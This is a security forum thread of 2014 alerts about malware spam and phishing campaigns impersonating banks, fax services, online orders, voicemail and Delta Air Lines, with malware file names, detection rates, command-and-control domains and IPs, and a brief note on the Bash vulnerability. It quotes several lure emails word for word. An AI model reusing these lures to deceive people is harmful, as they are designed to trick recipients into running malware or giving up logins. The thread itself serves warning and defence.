137.170.185.211: https://www.virustot...11/information/
___

Fake Bank SPAM - leads to malware
- http://blog.dynamoo....rcial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
    Lloyds Commercial Bank "Important - Commercial Documents"
    From:     Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date:     29 September 2014 11:03
    Subject:     Important - Commercial Documents
    Important account documents
    Reference: C947
    Case number: 18868193
    Please review BACs documents.
    Click link below, download and open document. (PDF Adobe file) ...

 HSBC Bank UK "Payment Advice Issued"
From:     HSBC Bank UK
Date:     29 September 2014 11:42
Subject:     Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...


The link in the email goes through a script and then downloads a file document_8641_29092014_pdf.scr (this time without a ZIP wrapper) which has a VirusTotal detection rate of just 1/55*. The Anubis report shows that the malware attempts to phone home to cuscorock .com which is probably a good thing to -block- or monitor."
* https://www.virustot...1e28b/analysis/
... Behavioural information
DNS requests
cuscorock .com (184.154.253.181)
formatech .es (81.88.48.71)
TCP connections
184.154.253.181: https://www.virustot...81/information/
81.88.48.71: https://www.virustot...71/information/
188.165.198.52: https://www.virustot...52/information/
___

Fake Order SPAM
- http://myonlinesecur...161864-malware/
29 Sep 2014 - "'Order statsus: Order confirmation: 9618161864' coming from random names at random companies is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Lots of different subjects for this email . All subjects have a random number involved and some have bad spelling mistakes, including:
- Order statsus: Order confirmation: 9618161864
- Order info: 32257958734
- Payment status: 93612666937
- Payment info: 21714421631
- Payment confirmation: 27863161481
The email looks like ( slightly different versions all with different names and phone numbers and companies):
Greetings,
 Your order #9618161864 will be shipped on 01.10.2014.
Date: September 29, 2014. 12:12pm
Price: £156.77
Transaction number: 9AECB76F37D22F21
 Please find the detailed information on your purchase in the attached file order_2014_09_29_9618161864.zip
 Kind regards,
Sales Department
Tiana Haggin ...


Date: order_2014_09_29_9618161864.zip: Extracts to: sale_2014_09_29_73981861092.exe

Current Virus total detections: 3/55* . This 'Order statsus: Order confirmation: 9618161864' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign icon, that makes you think it is a proprietary invoice  instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1411991708/
... Behavioural information
TCP connections
213.186.33.19: https://www.virustot...19/information/
23.62.99.24: https://www.virustot...24/information/
213.186.33.4: https://www.virustot....4/information/
___

More Fake Voicemail SPAM - fake wav malware
- http://myonlinesecur...ke-wav-malware/
29 Sep 2014 - "'New Voicemail Message SUY-301' coming form random email addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
  The Voice Mail message has been uploaded to the following web
    address ...
    You can play this Voice Mail on most computers.
    Please do not reply to this message. This is an automated message which
    comes from an unattended mailbox.
    This information contained within this e-mail is confidential to, and is
    for the exclusive use of the addressee(s).
    If you are not the addressee, then any distribution, copying or use of this
    e-mail is prohibited.
    If received in error, please advise the sender and delete/destroy it
    immediately.
    We accept no liability for any loss or damage suffered by any person
    arising from use of this e-mail.


... the link in the email is broken because the idiots who crafted the email messed up, the formatting. There are literally hundreds of these emails and almost all of them have a different link address and a different set of letters and numbers...
29 September 2014: voice448705888444.zip: Extracts to: voice448705888444.scr
Current Virus total detections: 1/55* . This 'New Voicemail Message SUY-301' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1412003182/
___

'Mailbox Has Exceeded The Storage Limit' - Phish ...
- https://blog.malware...ge-limit-phish/
Sep 29, 2014 - "Be wary of emails claiming you’ve gone over your email storage limit – users of both AOL and Outlook are reporting the following poorly written message crashing their mailbox party in the last couple of days:
    “Kindly Re-Validate Your Mailbox
    Your mailbox has exceeded the storage limit is 1 GB, which is defined by the administrator, are running at 99.8 gigabytes, you can not send or receive new messages until you re-validate your mailbox.
    To renew the mailbox,
    click link below: [removed]
    Thank you!
    Web mail system administrator!
    WARNING! Protect your privacy. Logout when you are done and completely
    exit your browser.”


The URL given on the Facebook post is already -dead- but it’s likely the people behind this have mails targeting other types of account and deploying multiple phish page links. In both examples, the scammers are using free AOL mail addresses – despite claiming to be from 'The Outlook Team' – which should raise a few red flags. AOL have confirmed the mail is a -hoax- and recipients should safely deposit it in their Trash folder..."
___

Bash Bug vulnerability
- http://www.symantec....g-vulnerability
Updated: 29 Sep 2014 - "... There are limited reports of the vulnerability being used by attackers in-the-wild. Proof-of-concept scripts have already been developed by security researchers. In addition to this, a module has been created for the Metasploit Framework, which is used for penetration testing...
How a malicious command can be tacked-on to the end of a legitimate environment variable. Bash will run the malicious command first
> http://www.symantec....am-600px_v2.png
... Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available..."

Table of C&C Servers:
- http://blog.trendmic...09/Table-01.jpg

89.238.150.154: https://www.virustot...54/information/
108.162.197.26: https://www.virustot...26/information/
162.253.66.76: https://www.virustot...76/information/
213.5.67.223: https://www.virustot...23/information/

:ph34r: :ph34r:  :grrr:


Edited by AplusWebMaster, Yesterday, 02:14 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1292 AplusWebMaster

AplusWebMaster

    AplusWebMaster

  • SWI Friend
  • PipPipPipPipPip
  • 9,071 posts

Posted Today, 05:41 AM

FYI...

Fake NatWest, new FAX SPAM
- http://blog.dynamoo....u-have-new.html
30 Sep 2014 - "The daily mixed spam run has just started again, these two samples seen so far this morning:

    NatWest: "You have a new Secure Message"
    From:     NatWest [secure.message@ natwest .com]
    Date:     30 September 2014 09:58
    Subject:     You have a new Secure Message - file-3800
    You have received a encrypted message from NatWest Customer Support
    In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
    Please download your ecnrypted message at ...

 "You've received a new fax"
From:     Fax [fax@victimdomain .com]
Date:     30 September 2014 09:57
Subject:     You've received a new fax
New fax at SCAN4148711 from EPSON by https ://victimdomain .com
Scan date: Tue, 30 Sep 2014 14:27:24 +0530
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...


The link in the email goes through a script to ensure that you are using a Windows PC and then downloads a file document3009.zip which contains a malicious executable document3009.scr which has a VirusTotal detection rate of 3/54*. The Comodo CAMAS report and Anubis report are rather inconclusive."
* https://www.virustot...sis/1412070442/
... Behavioural information
DNS requests
maazmedia .com (69.89.22.130)
TCP connections
188.165.198.52: https://www.virustot...52/information/
69.89.22.130: https://www.virustot...30/information/
___

Fake Delta Air SPAM - word doc malware
- http://myonlinesecur...rd-doc-malware/
30 Sep 2014 - "'Delta Air Thank you for your order' being sent to bookings@ uktservices .com and BCC copied  to you pretending to come from Delta Air <login@ proche-hair .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
     Order Notification,
    E-TICKET NUMBER / ET-98191471
    SEAT / 79F/ZONE 1
    DATE / TIME 2 OCTOBER, 2014, 11:15 PM
    ARRIVING / Berlin
    FORM OF PAYMENT / XXXXXX
    TOTAL PRICE / 214.61 GBP
    REF / OE.2368 ST / OK
    BAG / 3PC
    Your electronic ticket is attached to the letter as a scan document.
    You can print your ticket.
    Thank you for your attention.
    Delta Air Lines.


30 September 2014: ET-17843879.zip: Extracts to: DT-ET_5859799188.exe
Current Virus total detections: 4/55* . This 'Delta Air Thank you for your order' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper  Microsoft word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1412075964/
 

:ph34r:  :grrr:


Edited by AplusWebMaster, Today, 07:47 AM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.





5 user(s) are reading this topic

0 members, 5 guests, 0 anonymous users

Member of ASAP and UNITE
Support SpywareInfo Forum - click the button